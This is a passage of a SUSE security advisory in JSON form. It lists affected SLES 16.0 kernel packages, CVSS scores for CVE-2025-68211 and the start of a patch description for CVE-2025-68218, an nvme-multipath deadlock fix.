"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68211"
},
{
"cve": "CVE-2025-68218",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68218"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-multipath: fix lockdep WARN due to partition scan work\n\nBlktests test cases nvme/014, 057 and 058 fail occasionally due to a\nlockdep WARN. As reported in the Closes tag URL, the WARN indicates that\na deadlock can happen due to the dependency among disk-\u003eopen_mutex,\nkblockd workqueue completion and partition_scan_work completion.\n\nTo avoid the lockdep WARN and the potential deadlock, cut the dependency\nby running the partition_scan_work not by kblockd workqueue but by\nnvme_wq.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
